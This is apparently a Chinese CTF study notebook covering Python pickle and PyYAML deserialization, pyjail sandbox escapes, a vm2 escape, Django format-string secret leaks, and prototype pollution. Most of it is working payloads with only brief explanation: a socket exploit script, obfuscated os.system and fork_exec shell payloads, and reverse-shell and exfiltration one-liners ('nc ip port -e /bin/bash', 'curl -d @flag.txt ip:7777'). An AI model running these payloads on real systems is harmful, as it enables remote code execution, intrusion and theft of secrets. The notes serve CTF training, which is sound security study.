草文,发上来挂着
python反序列化
pickle反序列化
Python Pickle 序列化格式的协议 0/1/2(文本协议)
用guess_game这题的payload去分析py
前半部分:描述了一个简单的字典对象。后半部分看下边
cguess_game
game
}S'round_count'
I10
sS'win_count'
I10
sb等同于
class game:
def __init__(self):
self.round_count = 10
self.win_count = 10
# 示例字典形式:
obj = {
'round_count': 10,
'win_count': 10
}或
# Pickle 可能表示的类实例
from guess_game import game
obj = game()
obj.round_count = 10
obj.win_count = 10
| Opcode | 含义 |
|---|---|
c |
GLOBAL:加载一个全局对象,通常是模块中的类或函数。 |
} |
DICT:表示一个字典对象的开始。 |
S |
STRING:表示一个字符串。 |
I |
INT:表示一个整数(在协议 0 中的整数表示方法)。 |
s |
SETITEM:结束当前字典条目,表示为键值对设置值(键值关系存入字典)。 |
b |
STOP:表示序列化流结束,这是序列化文件的最后一个操作符。 |
c:引入模块和对象,模块名和对象名以换行符分割。(find_class校验就在这一步,也就是说,只要c这个OPCODE的参数没有被find_class限制,其他地方获取的对象就不会被沙盒影响了)
}:push一个空的字典,相当于push {}
S: push一个字符串
I: push一个整型
s: 按照我的理解以及一些参考文章,pop两位 ,然后作为字典的key和value,这个跟pyc的代码是类似的。
b: 调用__setstate__ 或者 __dict__.update()
dict.update:更新对象的属性的后半部分 :描述了一个 Ticket 类的实例。!不需要手搓,直接dump出来就行
cguess_game.Ticket\nTicket\nq\x00)\x81q\x01}q\x02X\x06\x00\x00\x00numberq\x03K\xffsb.| 部分 | 协议 |
|---|---|
cguess_game.Ticket\nTicket\n |
通用(协议 0 和协议 1 均支持)。 |
q\x00 q\x01 q\x02 q\x03 |
协议 2 :MEMOIZE 操作码记录引用。 |
)\x81 |
协议 2 :NEWOBJ 操作码用于高效创建新对象。 |
X\x06\x00\x00\x00number |
协议 1 :BINUNICODE 操作码表示字符串(协议 2 兼容协议 1 的操作码)。 |
| ```K\xff`` | 协议 1:```BININT1` 操作码表示小整数(协议 2 兼容协议 1 的操作码)。 |
s b .``S"win_count" I10 s S"round_count" I9 s |
协议 2 的 BUILD 操作码用于初始化对象,STOP 操作码表示流结束。 |
看不懂就去问GPT
exp↓
import pickle
import socket
import struct
s = socket.socket()
s.connect(('node2.buuoj.cn.wetolink.com', 28049))
exp = b'''cguess_game
game
}S"win_count"
I10
sS"round_count"
I9
sbcguess_game.Ticket\nTicket\nq\x00)\x81q\x01}q\x02X\x06\x00\x00\x00numberq\x03K\xffsb.'''
s.send(struct.pack('>I', len(exp)))
s.send(exp)
print(s.recv(1024))
print(s.recv(1024))
print(s.recv(1024))
print(s.recv(1024))picklecode分析exp
cbuiltins
getattr
(cbuiltins
dict
S'get'
tR(cbuiltins
globals
(tRS'builtins'
tRp1
cbuiltins
getattr
(g1
S'eval'
tR(S'__import__("os").system("id")'
tR.前边部分
cbuiltins
getattr
(cbuiltins
dict
S'get'
tR(cbuiltins
globals
(tRS'builtins'
tRp1t:
- 将之前的
dict和'get'打包成一个元组:(dict, 'get')。
R:
-
调用栈顶的函数(这里是
getattr),并使用栈中打包好的元组作为参数。 -
等效于执行:
getattr(dict, 'get')
(tR:压入空元组,形成globals()
S'builtins' :将字符串 'builtins' 压入栈。
R :调用 getattr(globals(), 'builtins'),获取全局命名空间中的 builtins 模块。
p1:将栈顶的 builtins 模块保存到标识符 p1 中(pickle 的内部标记)。
这样可以在后续代码中通过引用 p1 来复用 builtins 模块。接下来
getattr
(g1
S'eval'
tR(S'__import__("os").system("id")'
tR.g1 是之前序列化数据中定义的标识符,它引用的是全局命名空间对象(globals() 返回值)。
为什么不直接用 p1 来获取 eval?
虽然 eval 是一个内置函数,但它并不直接存在于 builtins 模块中,而是暴露在全局命名空间中。需要通过 globals() 获取它。这是因为:
-
全局命名空间的优先级高于
builtins:- 如果全局命名空间中存在与
builtins中同名的对象(例如用户定义的eval函数),Python 会优先使用全局命名空间中的定义。
- 如果全局命名空间中存在与
-
eval的定位:eval被直接注册在全局命名空间中,因此更适合通过globals()获取。
-
灵活性:
- 攻击者使用
globals()能更加灵活地访问所有全局变量,而不仅仅局限于builtins模块的内容。
- 攻击者使用
协议4具体编码
-
\x80 PROTO(调用lload_proto)
-
\x04 根据四号协议序列化的字符串
-
\X95 FRAME 调用load_frame读取后边8个字符串,:\X00\X00\X00\X00\X00\X00\X00
-
\x8c SHORT_BINUNICODE (对应load_short_binunicode),函数内容读取下一位,压入栈中
-
\x94 MEMOIZE (load_memoize)
函数内容是将栈中-1对应元素赋值给memo[0],这里的话就是memo[0]=\x08__main,而memo等于{},那么这里就是{\x08__main}- \x93 load_stack_global
函数内容是将栈中元素取出一个,作为对象名,这里就是name=tttang,接下来再取出一个,作为类名,这里就是module=__main__,然后压入栈中
stack:[<class '__main__.tttang'>]-
),对应的是EMPTY_TUPLE,也就是向栈中加入空元组 -
\x81 对应函数是
load_newobj,弹出()赋值给args -
},往栈中压入空的字典 -
(,对应方法为load_mark,函数内容是将栈中元素压入到metastack中,然后将栈置空 -
u,对应函数为load_setitems,将栈赋值给items变量,然后将metastack中的弹出赋值给栈,所以这里的栈就变成了<class '__main__.tttang'>,{},这里的话就是取出__main__.tttang作为字典,接下来进行range遍历
弹shell/找flag
nc ip port -e /bin/bash
curl -d @flag.txt ip:7777
__import__('os').system('/bin/sh')找flag-------
du -ah / | grep flag 磁盘搜索py反序列化做题
commands包需要py2,d盘有文件
-
[CISCN2019 华北赛区 Day1 Web2]ikun
-
[watevrCTF-2019]Pickle Store
-
[SUCTF 2019]Guess Game
-
24极客ez_python
用钩子函数error_handler_spec写内存码 -
dasctf2024冬季-const_python
yaml反序列化
https://xz.aliyun.com/t/12481?time__1311=GqGxRQqiuDyDlrzG78GO7G8Imq0Kpo3x列表
(List):列表用短横线(-)表示
fruit: [apple, banana, orange]
相当于
fruits:
- apple
- banana
- orange支持多维数组(用缩进表示层级关系)
fruit:
-
- apple
- banana
-
- orange漏洞
PyYaml<=5.1
默认Constructor为加载器,但是经过审计yaml模块中的Constructor.py的源码中存在对于python的标签解析时的漏洞。
!!python/object标签
!!python/object/apply标签
!!python/object/new
!!python/module
!!python/name
PyYaml>5.1
在PyYaml>5.1的版本之后,如果要使用load()函数,要跟上一个Loader的参数,否则会报错。(不影响正常输出)
-
BaseConstructor:没有任何强制类型转换 -
SafeConstructor:只有基础类型的强制类型转换 -
yaml.FullLoader: -
UnsafeConstructor:支持全部的强制类型转换 -
Constructor:等同于UnsafeConstructor
yaml.SafeLoader:这会加载一些基础的数据类型(如字典、列表、字符串等),并且禁止加载一些潜在危险的对象(如自定义类的实例)。
yaml.FullLoader :如果你需要加载 YAML 文件中的所有 Python 对象,包括一些自定义类或复杂的结构,可以使用 FullLoader,但请注意它可能会引入安全风险,尤其是在加载不可信的数据时。
py沙箱逃逸
找flag
find / -type f -name "flag*" 2>/dev/nullchcp 65001 换码utf_8Python沙箱逃逸(pyjail) - w1hake2 - 博客园(有题目)
沙箱逃逸-通过题解了解沙箱逃逸_sandbox namespace绕过-CSDN博客(同上)
https://zhuanlan.zhihu.com/p/579183067
过滤单双引号反引号
-
用chr构造
-
搭配len和repr
eval(chr(95)+chr(95)+chr(105)+chr(109)+chr(112)+chr(111)+chr(114)+chr(116)+chr(95)+chr(95)+chr(40)+chr(39)+chr(115)+chr(111)+chr(39)+chr(91)+chr(58)+chr(58)+chr(45)+chr(49)+chr(93)+chr(41)+chr(46)+chr(115)+chr(121)+chr(115)+chr(116)+chr(101)+chr(109)+chr(40)+chr(39)+chr(99)+chr(97)+chr(116)+chr(32)+chr(102)+chr(108)+chr(97)+chr(103)+chr(39)+chr(41))open(chr(102)+chr(108)+chr(97)+chr(103)).read()
open(chr(47)+chr(102)+chr(108)+chr(97)+chr(103)).read()
print(().__class__.__bases__[0].__subclasses__()[132].__init__.__globals__[chr(112)+chr(111)+chr(112)+chr(101)+chr(110)](chr(102)+chr(105)+chr(110)+chr(100)+chr(32)+chr(47)+chr(32)+chr(45)+chr(110)+chr(97)+chr(109)+chr(101)+chr(32)+chr(34)+chr(102)+chr(108)+chr(97)+chr(103)+chr(34)).read())- 用bytes构造
open((bytes([102])+bytes([108])+bytes([97])+bytes([103])).decode()).read()print(bytes([115, 121, 115, 116, 101, 109])) # b'system'
print(bytes([115, 121, 115, 116, 101, 109]).decode()) # system
print(bytes([115, 121, 115, 116, 101, 109]).__class__) # <class 'bytes'>
print(bytes([115, 121, 115, 116, 101, 109]).decode().__class__) # <class 'str'>-
查找bytes的位置
().__class__.__base__.__subclasses__()[6]
- 用type构造bytes system('sh')例↓
[].__class__.__mro__[-1].__subclasses__()[-4].__init__.__globals__[(type(str(1).encode())([115])+type(str(1).encode())([121])+type(str(1).encode())([115])+type(str(1).encode())([116])+type(str(1).encode())([101])+type(str(1).encode())([109])).decode()]((type(str(1).encode())([115])+type(str(1).encode())([104])).decode())- doc硬凑拼图
# system
().__doc__[19]+().__doc__[86]+().__doc__[19]+().__doc__[4]+().__doc__[17]+().__doc__[10]
# sh
().__doc__[19]+().__doc__[56]+被ban
用.add代替,然后除了第一个都要用()包上''.join(['1', '2', '3', '4'])数字被ban
-
True构造数字
len(repr(True))repr(True) 的值是字符串 'True',长度为 4,所以 len(repr(True)) = 4。 (True + True + True)**(True + True + True) 计算 3**3,结果是 27。 all(()) + all(()) == 2__import__('os').system('sh')当os和ls关键字绕过之后,构造关键字如下 __import__(chr((True+True+True)**(True+True+True)*len(repr(True))+True+True+True)+chr((True+True+True)**(True+True+True)*len(repr(True))+(True+True+True+True+True+True+True))).system(chr((True+True+True)**(True+True+True)*len(repr(True))+(True+True+True+True+True+True+True))+chr((True+True+True)**(True+True+True)*len(repr(True))-len(repr(True))))
字母被ban
-
unicode
字符串绕过
['__builtins__']
['\x5f\x5f\x62\x75\x69\x6c\x74\x69\x6e\x73\x5f\x5f']
[u'\u005f\u005f\u0062\u0075\u0069\u006c\u0074\u0069\u006e\u0073\u005f\u005f']
['X19idWlsdGluc19f'.decode('base64')]
['__buil'+'tins__']
['__buil''tins__']
['__buil'.__add__('tins__')]
["_builtins_".join("__")]
['%c%c%c%c%c%c%c%c%c%c%c%c' % (95, 95, 98, 117, 105, 108, 116, 105, 110, 115, 95, 95)]#最后这个第一次见,如果没有变态到过滤字母和数字就无敌的了长度限制
-
13
-
eval(input())进入交互状态,open('flag').read()
-
eval,input,help被禁用,用unicode
-
𝓮val(inp𝓾t())
-
𝓮𝑣ᵃ𝑙(ⁱ𝓷𝓅𝓾ₜ())
-
𝒆𝓋𝒶𝒍(𝑖𝓷𝓹𝓾𝓽())
-
-
breakpoint()截断获取,然后直接敲命令
- 𝔟𝓻𝒆𝒶𝓴𝓹𝒐𝑖𝓷𝓽()
-
-
6
-
help
输入help(),这里字符串长度6会进入正常调用eval函数,在help交互式下,输入任意模块名称得该模块的帮助文档,如sys,在Linux中,呈现帮助文档时,实际调用系统的less或more命令,利用这两个命令执行本地命令特性获取shell,继续按#!,执行外部命令sh即可(!ls,!cat flag)
-
组合拳--找key
-
9
- globals()
-
6
__main__- vars()
python2
print input_data
这类语句直接__import__('os').system('ls') 其他操作
获取全局变量
global ()和locals ()函数
使用global ()可以获取Python中的全局变量;
使用locals ()可以获取Python中的局部变量;import('os').system('bash')获取终端 /sh> dir()
['__builtins__', 'my_flag']
#有个my_flag跟进一下
> dir(my_flag)
#发现flag_level5,继续跟进
> dir(my_flag.flag_level5)
#发现'encode',可以用这个方法实现
> my_flag.flag_level5.encode()getattr渐变过程
().__class__.__base__.__subclasses__()
getattr(().__class__, '__base__').__subclasses__()
getattr(().__class__, chr(95)+chr(95)+chr(98)+chr(97)+chr(115)+chr(101)+chr(95)+chr(95)).__subclasses__()system构造2
list(dict(system=114514))[0]可以获取system这个字符串[HNCTF 2022 WEEK2]laKe laKe laKe(JAIL)
先打开,再读取,再输出
__import__("sys").__stdout__.write(__import__("os").read(__import__("os").open("flag",__import__("os").O_RDONLY), 0x114).decode())
---------------------[HNCTF 2022 WEEK2]lak3 lak3 lak3(JAIL)
-
调用栈的帧对象getframe
__import__("sys").stdout.write(str(import("sys").getframe(1)))__import_("sys").stdout.write(str(import("sys")._getframe(1).f_locals))
frame对象指向'/home/ctf/./server.py'这个file,直接调用f_locals属性查看变量int(str(import('sys')._getframe(1).f_locals["right_guesser_question_answer"]))
相当于输入全局变量的标准答案执行函数调用/编写 lambda表达式
[HNCTF 2022 WEEK3]s@Fe safeeval(JAIL)
适用于一些计算的绕过,如safeeval.test_expr的绕过
# 定义一个函数:接收 x,返回 x 的平方
square = lambda x: x ** 2
print(square(5)) # 输出: 25题解
(lambda:os.system('cat flag'))()import加载被过滤
__loader__.load_module('_posixsubprocess')
或者__builtins__['__loader__'].load_module('_posixsubprocess')audit_hook(pipe和_posixsubprocess)
[HNCTF 2022 WEEK3]calc_jail_beginner_level6(JAIL)
白名单问题看不懂去下一大标题↓
利用_posixsubprocess.fork_exec来实现RCE
---------------------
https://ctftime.org/writeup/31883_posixsubprocess.fork_exec(
[b"/bin/sh"], # 命令和参数
[b"/bin/sh"], # 可执行文件
True, # 关闭文件描述符
(), # 工作目录为空
None, None, # 环境变量未设置
-1, -1, -1, -1, # 输入输出文件描述符
-1, -1, *(os.pipe()), # 使用管道通信
False, False, None, None, None, -1, None
)匿名管道:os.pipe() 创建的管道在操作系统层面是匿名的,只存在于内存中,并且只能在父子进程之间使用。
有名管道(FIFO):与匿名管道不同,有名管道会创建一个具名的文件节点(通过 os.mkfifo() 创建),进程之间可以通过该文件名通信。getting_import方法,然后improt _posixsubprocess
__builtins__['__loader__'].load_module('_posixsubprocess')
或者
__loader__.load_module('_posixsubprocess')import_ = ().__class__.__base__.__subclasses__()[84].load_module
_posixsubprocess = import_("_posixsubprocess")
pipe = ().__class__.__base__.__subclasses__()[133].__init__.__globals__['pipe']payload
import os
__loader__.load_module('_posixsubprocess').fork_exec([b"/bin/sh"], [b"/bin/sh"], True, (), None, None, -1, -1, -1, -1, -1, -1, *(os.pipe()), False, False, None, None, None, -1, None)
或
_posixsubprocess.fork_exec([b"/readflag"], [b"/readflag"], True, (), None, None, -1, -1, -1, -1, -1, -1, *(pipe()), False, False, None, None, None, -1, None)海量运算符和秒断shell
[HNCTF 2022 WEEK2]lak3 lak3 lak3(JAIL)
下边这个连上shell秒断
[os := __import__('os'), _posixsubprocess := __loader__.load_module('_posixsubprocess'), _posixsubprocess.fork_exec([b"/bin/sh"], [b"/bin/sh"], True, (), None, None, -1, -1, -1, -1, -1, -1, *(os.pipe()), False, False, None, None, None, -1, None)]下边这个暴力多次尝试连接,考验手速,(预先保留payload,弹出shell的时候)
[os := __import__('os'), _posixsubprocess := __loader__.load_module('_posixsubprocess'), [_posixsubprocess.fork_exec([b"/bin/sh"], [b"/bin/sh"], True, (), None, None, -1, -1, -1, -1, -1, -1, *(os.pipe()), False, False, None, None, None, -1, None) for i in range(10000000000)]]用metaclass
[HNCTF 2022 WEEK3]calc_jail_beginner_level7(JAIL)
通过metaclass给类添加属性
将一个类的某个属性修改为os.system这样的函数,调用的时候就可以执行;结合之前提到__getitem__可以传入字符串的属性,就可以完美构造payloadp1 --遗留了Expr和Call
import os
class WOOD():
pass
WOOD.__getitem__=os.system
WOOD()['sh']p2 --洗清的,无遗留
class WOOD(type):
__getitem__=os.system
class WHALE(metaclass=WOOD):
pass
tmp = WHALE['sh']p3函数装饰器和类定义绕过--https://zhuanlan.zhihu.com/p/579183067
E
Pls input your code: (last line must contain only --HNCTF)
@exec
@input
class X: pass
--HNCTF
check is passed!now the result is:
<class '__main__.X'>
然后输入__import__('os').system('sh')
出shell$()
__import__("os").system("$(printf'\144\144\40\151\146\75\57\146\154\141\147')")s黑白名单问题
sys.audit钩子的触发范围有限
sys.audit 是一种事件触发机制,但它只能捕捉一些 特定事件。而 Python 内部的一些模块加载和对象属性访问操作(比如直接使用 __loader__ 或 __builtins__)并不触发相关的审计事件,因此它们绕过了 sys.audit。 Python 的内部机制属性,它们属于运行时的低层次功能访问,直接操作它们的行为并未触发 sys.audit 钩子所监控的事件抽象语法树查看
(Abstract Syntax Tree)抽象语法树
import ast
src='''
import os
class WOOD():
pass
WOOD.__getitem__=os.system
WOOD()['sh']
'''
ast_node = ast.parse(src, "test", mode="exec")
print(ast.dump(ast_node))导包
常见
执行系统命令 : os.system, os.spawn, subprocess.Popen。
启动 Shell 或外部进程 : pty.spawn, os.posix_spawn。
动态代码执行 : code.__new__, function.__new__。
破坏安全机制 : _PySys_ClearAuditHooks。
文件系统访问 : open
__import__('pty').spawn('/bin/sh')- 是用于创建伪终端的工具,通常在 Unix 系统(如 Linux 和 macOS)上使用
os系列
'os.system'
'os.exec' 家族
'os.posix_spawn'
可以通过 os.posix_spawn('/bin/sh', ...) 获得 Shell 访问。
'os.spawn'
直接运行系统命令,与 os.system 类似,但支持更灵活的参数。
'subprocess.Popen'
可以通过 subprocess.Popen(["/bin/sh"]) 获取 Shell。
__import__('subprocess').Popen(["/bin/sh"])-
'os.exec' 家族
-
包括 os.execv, os.execl, os.execvp, os.execve, os.execvpe
-
一旦调用,当前 Python 沙箱进程将被替换为目标程序,不再受 Python 沙箱的任何限制。
-
例如,调用 /bin/sh 或恶意二进制文件,可以轻松逃逸沙箱。
-
-
'cpython._PySys_ClearAuditHooks'
- 清除审计hook
-
code.__new__: 用于直接构造新的代码对象。function.__new__: 用于动态创建函数对象。
抽象语法树?
Del
-
作用: 删除变量或对象。在沙箱逃逸中,可以用来清除限制变量或绕过某些防护机制
del globals()['__builtins__']['exit']FunctionDef 和 AsyncFunctionDef
-
作用: 定义函数或异步函数。在逃逸中可以用来封装恶意代码,隐藏其意图。
def run_cmd(cmd):
__import__('os').system(cmd)
run_cmd('ls')
async def run_cmd(cmd):
__import__('os').system(cmd)Add, Sub, Mult, Div
-
作用: 数学运算符,在沙箱中可能被利用为字符串拼接或数据混淆。
''.join(['o', 's']) + '.' + 'system' + '(' + '"ls"' + ')'
eval(chr(111) + chr(115) + chr(46) + chr(115) + chr(121) + chr(115) + chr(116) + chr(101) + chr(109) + '("ls")')Expr
-
作用: 表达式节点,代表独立的计算语句。在沙箱中可以通过构造表达式执行代码
(lambda: __import__('os').system('ls'))()Call
-
作用 : 表示对函数或类的调用。在沙箱逃逸中,
Call是执行核心功能(如运行命令或创建对象)的基础。
__builtins__.__import__('os').system('ls')
eval('os.system("ls")')沙箱做题py
极客ctf
welcome jail
hard jail
doSomeMathhard jail
法一
black=[“”“”“]这样的list是可以赋值为空的
black=[] 直接把黑名单赋空
修改black = ('some', 'items', 'to', 'block') 因为元组不可变
black = frozenset(['some', 'items', 'to', 'block'])不变集合法二
help.__class__.__eq__=eXec
help._class__.__getattribute__=input
help == help.a
给比较eq赋值exec;给help获取属性时赋值input
==触发eq help.a触发input,第三行就是触发exec(input())了法三
import enum
from os import system
enum.EnumMeta.__getitem__ = system
enum.Enum[request.args[{}.__doc__[2]+{}.__doc__[15]+{}.__doc__[0]]]
>>e=[].__doc__[15]
>>n=[].__doc__[7]
>>v=[].__doc__[48]
>>enum.Enum[e+n+v] doSomeMath
().__le__(((),()))
().__ge__(())用白名单构造出来的true
__le__ 是 Python 的一个特殊方法(魔法方法),用于实现 <= 运算符
if 99 * 100 ^ 60 == eval(result): 这个左边算完是7920from pwn import *
data="().__le__(((),()))+"*1680
data2="(().__le__(((),()))+().__le__(((),())))**(().__le__(((),()))+
().__le__(((),())))**(().__le__(((),()))+().__le__(((),())))*(().__le__(((),()))+
().__le__(((),())))*(().__le__(((),()))+().__le__(((),())))*(().__le__(((),()))+
().__le__(((),())))*(().__le__(((),()))+().__le__(((),())))*(().__le__(((),()))+
().__le__(((),())))*(().__le__(((),()))+().__le__(((),())))*(().__le__(((),()))+
().__le__(((),())))*(().__le__(((),()))+().__le__(((),())))*(().__le__(((),()))+
().__le__(((),())))+"+data
p=remote("nc1.ctfplus.cn",41784)
p.recvuntil(b"99*100^60=")
p.sendline(data2[:-1])
p.interactive()[DDCTF 2019]homebrew event loop
源码审计moejail_lv1-4
-
无过滤
-
char构造
-
Unicode构造
-
eval被覆盖成函数,不是builtin_function_or_method,变成了function,所以直接从eval中拿到函数定义时的globals,从中还原builtins构造如下↓
eval.__globals__["__builtins__"].__spec__.loader().load_module("os").system("/bin/sh")
通解
[
x.__init__.__globals__
for x in "".__class__.__base__.__subclasses__()
if x.__name__ == "_wrap_close"
][0]["system"]("/bin/sh")附readme
初步分析,因为open打开文件未关闭就执行rm删除代码,所以文件不应该被删除,
统中当前运行的每一个进程都有对应的一个目录在/proc下,以进程的PID号为目录名,/proc/self表示当前进程目录。但是在此处我们不能直到进程的pid号所以需要用到/proc/self 来表示当前进程目录。
self 目录比较独特,不同的进程访问该目录时获得的信息时不同的,内容等价于/proc/pid/。进程可以通过访问/proc/self/目录来获取自己的系统信息,而不用每次都获取pid。
fd是一个目录,里面包含着当前进程打开的每一个文件的描述符,并将其作为路径,这些文件描述符是指向实际文件的一个符号连接。
https://www.bookstack.cn/read/linux-insides-zh/SysCall-linux-syscall-5.md
[彻底弄懂 Linux 下的文件描述符(fd) | 半亩方塘 (handongke.github.io)](https://handongke.github.io/2020/08/14/彻底弄懂 Linux 下的文件描述符(fd)/#5、Python中文件描述符的使用)payload /proc/self/fd/3vm沙箱
[HFCTF2020]JustEscape vm沙箱逃逸
https://github.com/patriksimek/vm2/issues/22524极客escapeSandbox_PLUS
js的小特性
两个奇特的字符"ı"、"ſ"。
这两个字符的“大写”是I和S。也就是说"ı".toUpperCase() == 'I',"ſ".toUpperCase() == 'S'。通过这个小特性可以绕过一些限制。 cve
async function fn() {
(function stack() {
new Error().stack;
stack();
})();
}
p = fn();
p.constructor = {
[Symbol.species]: class FakePromise {
constructor(executor) {
executor(
(x) => x,
(err) => { return err.constructor.constructor('return process')().mainModule.require('child_process').execSync('sleep 3'); }
)
}
}
};
p.then();python 格式化字符串漏洞
Python 格式化字符串漏洞(Django为例) | 离别歌
模板中的表达式:
{{ request.user.groups.source_field.opts.app_config.module.admin.settings.SECRET_KEY }}逐级分析:
-
request:-
模板中
request是 Django 提供的全局变量,代表当前 HTTP 请求对象。 -
由
django.template.context_processors.request注入模板上下文。
-
-
request.user:- 当前登录用户的用户对象,通常是
django.contrib.auth.models.User的实例。
- 当前登录用户的用户对象,通常是
-
request.user.groups:- 获取用户所属的所有组,通常是一个关联管理器 (
RelatedManager),表示多对多关系。
- 获取用户所属的所有组,通常是一个关联管理器 (
-
request.user.groups.source_field:-
source_field可能是内部属性,用于表示组模型与用户模型关联的字段。 -
Django 内部使用这种字段来描述模型的关系。
-
-
opts:- Django 模型的
_meta信息的别名,包含模型的元数据。
- Django 模型的
-
opts.app_config:- 与之前分析一致,获取模型所属应用的配置信息。
-
opts.app_config.module.admin:- 获取该应用模块的
admin文件模块。
- 获取该应用模块的
-
opts.app_config.module.admin.settings:- 指向 Django 的
settings模块。
- 指向 Django 的
-
opts.app_config.module.admin.settings.SECRET_KEY:- 从 Django 设置中获取
SECRET_KEY值。
- 从 Django 设置中获取
user.__class__._meta.app_config.module.admin.settings.DATABASES1. user
- 这是一个对象,通常代表一个用户实例(可能是
django.contrib.auth.models.User的实例,或一个自定义用户模型实例)。
2. user.__class__
- 返回
user对象的类。例如,如果user是User的实例,那么user.__class__就是<class 'django.contrib.auth.models.User'>。
3. user.__class__._meta
-
在 Django 的模型类中,每个模型都有一个
_meta属性,包含该模型的元信息(metadata)。 -
_meta是django.db.models.options.Options的实例,用于存储模型的配置信息,如字段、表名、关联关系等。
4. user.__class__._meta.app_config
-
app_config是与模型关联的 Django 应用的配置信息,通常是django.apps.config.AppConfig的实例。 -
它存储了当前模型所属应用的相关信息。例如:
-
app_config.name: 应用的名称(如auth)。 -
app_config.module: 应用的 Python 模块。
-
5. user.__class__._meta.app_config.module
-
module是 Django 应用的 Python 模块引用。 -
例如,如果
app_config.name是myapp,那么module可能是<module 'myapp' from 'myapp/__init__.py'>。
6. user.__class__._meta.app_config.module.admin
-
admin可能是应用模块中的admin.py文件引用。 -
通过访问
module.admin,可以动态引用 Django 应用的admin模块。
7. user.__class__._meta.app_config.module.admin.settings
-
如果
admin模块中导入了settings,则这里是一个指向 Django 的settings配置模块的引用(例如,通过from django.conf import settings)。 -
settings是 Django 的配置对象,包含所有配置项(如DATABASES,INSTALLED_APPS)。
8. user.__class__._meta.app_config.module.admin.settings.DATABASES
-
DATABASES是 Django 的数据库配置项,通常在settings.py中定义。 -
它是一个字典,存储了项目中数据库的配置信息。例如:
python复制代码DATABASES = { 'default': { 'ENGINE': 'django.db.backends.sqlite3', 'NAME': BASE_DIR / 'db.sqlite3', } } -
通过
user.__class__._meta.app_config.module.admin.settings.DATABASES,你访问到了settings.DATABASES。
py原型链污染
- object无法被污染
学习网站
危险代码段
-
merge
获取目标类
-
根据父子关系获取
payload = { "__class__" : { "__base__" : { "secret" : "world" } } } -
获取全局变量
a=1 def demo(): pass class A : def __init__(self): pass print(demo.__globals__==globals()==A.__init__.__globals__) 在函数或类方法中,我们经常会看到__init__初始化方法,但是它作为类的一个内置方法,在没有被重写作为函数的时候,其数据类型会被当做装饰器,而装饰器的特点就是都具有一个全局属性__globals__属性,__globals__ 属性是函数对象的一个属性,用于访问该函数所在模块的全局命名空间。具体来说就是,__globals__ 属性返回一个字典,里面包含了函数定义时所在模块的全局变量。
加载其他模块
-
import加载获取
-
sys模块加载获取
-
加载器loader获取
函数形参默认值替换
在Python中,1.__defaults__是一个元组,用于存储函数或方法的默认参数值。当我们去定义一个函数时,可以为其中的参数指定默认值。这些默认值会被存储在__defaults__元组中。
2.__kwdefaults__是以字典形式来进行收录:和default一个样子
def a(var_1, var_2 =2, var_3 = 3):
pass
print(a.__defaults__)
#(2, 3)所以我们就可以通过替换该属性,来实现对函数位置或者是键值默认值替换,但是前提条件是我们要替换的值是元组的形式:`
payload = {
"__init__" : {
"__globals__" : {
"demo" : {
"__defaults__" : (True,)
}
}
}
}用kwdefaults形式如下↓
payload = {
"__init__" : {
"__globals__" : {
"demo" : {
"__kwdefaults__" : {
"shell" : True
}
}
}
}
}关键信息替换
-
flask密钥替换
-
_got_first_request:
payload={ "__init__":{ "__globals__":{ "app":{ "_got_first_request":False } } } } 用于判定是否某次请求为自Flask启动后第一次请求,是Flask.got_first_request函数的返回值,此外还会影响装饰器app.before_first_request的调用,而_got_first_request值为假时才会调用: -
_static_url_path:
payload={ "__init__":{ "__globals__":{ "app":{ "_static_folder":"./" } } } } 用来绕过原配的静态目录static -
os.path.pardir:
payload={ "__init__":{ "__globals__":{ "os":{ "path":{ "pardir":"," } } } } } 在绕过静态目录static的时候;模板渲染的时候,防止目录穿梭的限制操作,把这个os.path.pardir修改为。。意外的其他值 -
jinjia2语法标识,修改flask模板开头标识和结尾标识
{ "__init__" : { "__globals__" : { "app" : { "jinja_env" :{ "variable_start_string" : "[[","variable_end_string":"]]" } } } }
js污染
https://xz.aliyun.com/t/7182?time__1311=n4%2BxnD0Dy737q4YqAKDsA3rxIoxvrDgnDGTID(1)所有引用类型(函数,数组,对象)都拥有__proto__属性(隐式原型
(2)所有函数拥有prototype属性(显式原型)(仅限函数)
我们可以通过构造函数A创建一个实例对象A,A默认会有一个属性__proto__指向了构造函数A的原型对象B。
关系
function Foo(){};
undefined
let foo = new Foo();
undefined
Foo.prototype == foo.__proto__
true什么时候能被利用
存在可控的对象键值
1.常发生在merge 等对象递归合并操作
2.对象克隆
3.路径查找属性然后修改属性的时候
https://xz.aliyun.com/t/7025?time__1311=n4%2BxnD0Dy7itGQ%3D47KDsA3r%3D%3DIvwDAK%2B5d4xhttps://xz.aliyun.com/t/7182?time__1311=n4%2BxnD0Dy737q4YqAKDsA3rxIoxvrDgnDGTIDredis.lua沙箱逃逸
return redis.call('set','webshell','木马')
eval "return redis.call('get','foo')" 0
CONFIG GET dbfilename